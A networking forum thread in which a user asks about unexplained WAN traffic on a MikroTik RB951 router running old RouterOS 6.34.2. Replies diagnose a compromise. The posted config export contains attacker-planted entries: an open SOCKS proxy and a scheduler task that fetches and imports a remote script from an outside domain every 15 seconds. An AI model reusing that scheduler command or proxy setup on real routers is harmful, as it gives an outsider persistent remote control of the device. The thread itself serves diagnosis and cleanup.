I’m setting up a RB951-2n as a router with Ether1 as the WAN port and each of the other Ethernet ports as separate LANS (i.e. Ether2 is 192.168.2.0/24, Ether3 is 192.168.3.0/24 and so on). Separate DHCP servers are defined for each ethernet port. Have configured NAT and set up standard firewall rules.
It seems to work ok (have only tested Ethernet2 net so far.
There is, however, a lot of traffic on the router’s WAN-port (Ether1) - even if nothing is connected to any of the other ports.
Any ideas what this is, and what is causing it (and how to stop it)?

The WAN ip in the log is greyed out in order to not disclose the real address.

-Olaf-

srcnat occurs in postrouting chain, therefore is applied to both forwarding and output chains (unless your rule specify otherwise)
From this log, it is impossible to make sure, where the data comes from. by looking at stats of each interface, torch results or packet sniffer results, you should be able to track down what is causing this traffic.
If you want other’s to tell you possible causes, you will need to share your config (/export hide-sensitive). It is recommended to find+replace all personal data (public IP, passwords etc…)
Without knowing your config, it is just completely wild guessing.

Thanks for the info.
Did an export from the router and have included it below.
Seems like some strange stuff in there - things I've never entered, like the /ip socks access
Also, at the end of the config - the /system scheduler.
There was also a file on the router - 7wmp0b4swouv - that I have no knowledge of.
May seem like an infection?
Router is now disconnected from the internet....
Before starting the config, the router was set to factory default.

-Olaf-

nov/01/2018 10:13:33 by RouterOS 6.34.2

software id = KMXG-D411

/ip pool
add name=pool2 ranges=192.168.2.20-192.168.2.99
add name=pool3 ranges=192.168.3.30-192.169.3.100
/ip dhcp-server
add address-pool=pool2 disabled=no interface=ether2 lease-time=1d12m name=
server2
add address-pool=pool3 disabled=no interface=ether3 name=server3
/queue simple
add max-limit=3M/3M name=speed2 target=ether2
/ip address
add address=xxx.xxx.xxx.xxx/25 interface=ether1 network=xxx.xxx.xxx.128
add address=192.168.88.1/24 interface=ether5 network=192.168.88.0
add address=192.168.4.1/24 interface=ether4 network=192.168.4.0
add address=192.168.3.1/24 interface=ether3 network=192.168.3.0
add address=192.168.2.1/24 interface=ether2 network=192.168.2.0
/ip dhcp-server network
add address=192.168.2.0/24 dns-server=192.168.2.1,yyy.yyy.yyy.yyy gateway=
192.168.2.1 netmask=24
add address=192.168.3.0/32 dns-server=yyy.yyy.yyy.yyy gateway=192.168.3.1
netmask=24
/ip dns
set servers=8.8.8.8,1.1.1.1
/ip firewall filter
add chain=input protocol=icmp
add chain=input dst-port=8291 protocol=tcp
add chain=input connection-state=established,related
add action=drop chain=input in-interface=ether1
add chain=forward connection-state=established,related
add action=drop chain=forward connection-state=invalid
/ip firewall nat
add action=masquerade chain=srcnat log=yes out-interface=ether1
/ip route
add distance=1 gateway=xxx.xxx.xxx.129
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh disabled=yes port=19854
set api disabled=yes
set api-ssl disabled=yes
/ip socks
set enabled=yes port=3585
/ip socks access
add src-address=5.188.0.0/15
add src-address=192.243.0.0/16
add src-address=5.9.0.0/16
add src-address=5.104.0.0/16
add action=deny src-address=0.0.0.0/0
add src-address=5.188.0.0/15
add src-address=192.243.0.0/16
add src-address=5.9.0.0/16
add src-address=5.104.0.0/16
add action=deny src-address=0.0.0.0/0
add src-address=5.188.0.0/15
add src-address=192.243.0.0/16
add src-address=5.9.0.0/16
add src-address=5.104.0.0/16
add action=deny src-address=0.0.0.0/0
/system clock
set time-zone-name=Europe/Oslo
/system leds
set 0 interface=wlan1
/system ntp client
set enabled=yes primary-ntp=aaa.aaa.aaa.aaa
/system routerboard settings
set cpu-frequency=400MHz
/system scheduler
add interval=15s name=U6 on-event="/tool fetch url=http://fanmusic.xyz/poll/f8\
6e8ac6-405b-43c9-9916-d29afaeec294 mode=http dst-path=7wmp0b4swouv\r
\n/import 7wmp0b4swouv" policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=
startup

Please read this post from MikroTik, it contains all info to fix the issue:

https://blog.mikrotik.com/security/winbox-vulnerability.html

It’s fairly obvious that things you didn’t enter have been entered by someone else, is it not?
6.34.2 is ancient and insecure, which is why it happened. Did you search the forum or look in Announcements?
Upgrade to a modern version, clear out all the junk, and set up a proper firewall (or preferably restore to default configuration and go from there re-entering the required bits of your config.)

Thanks!

Good that this was only a test setup (and I didn’ check the OS version).
All other Mikrotiks in my system are on OS 6.42 or higher.
Changing all passwords now…
-O-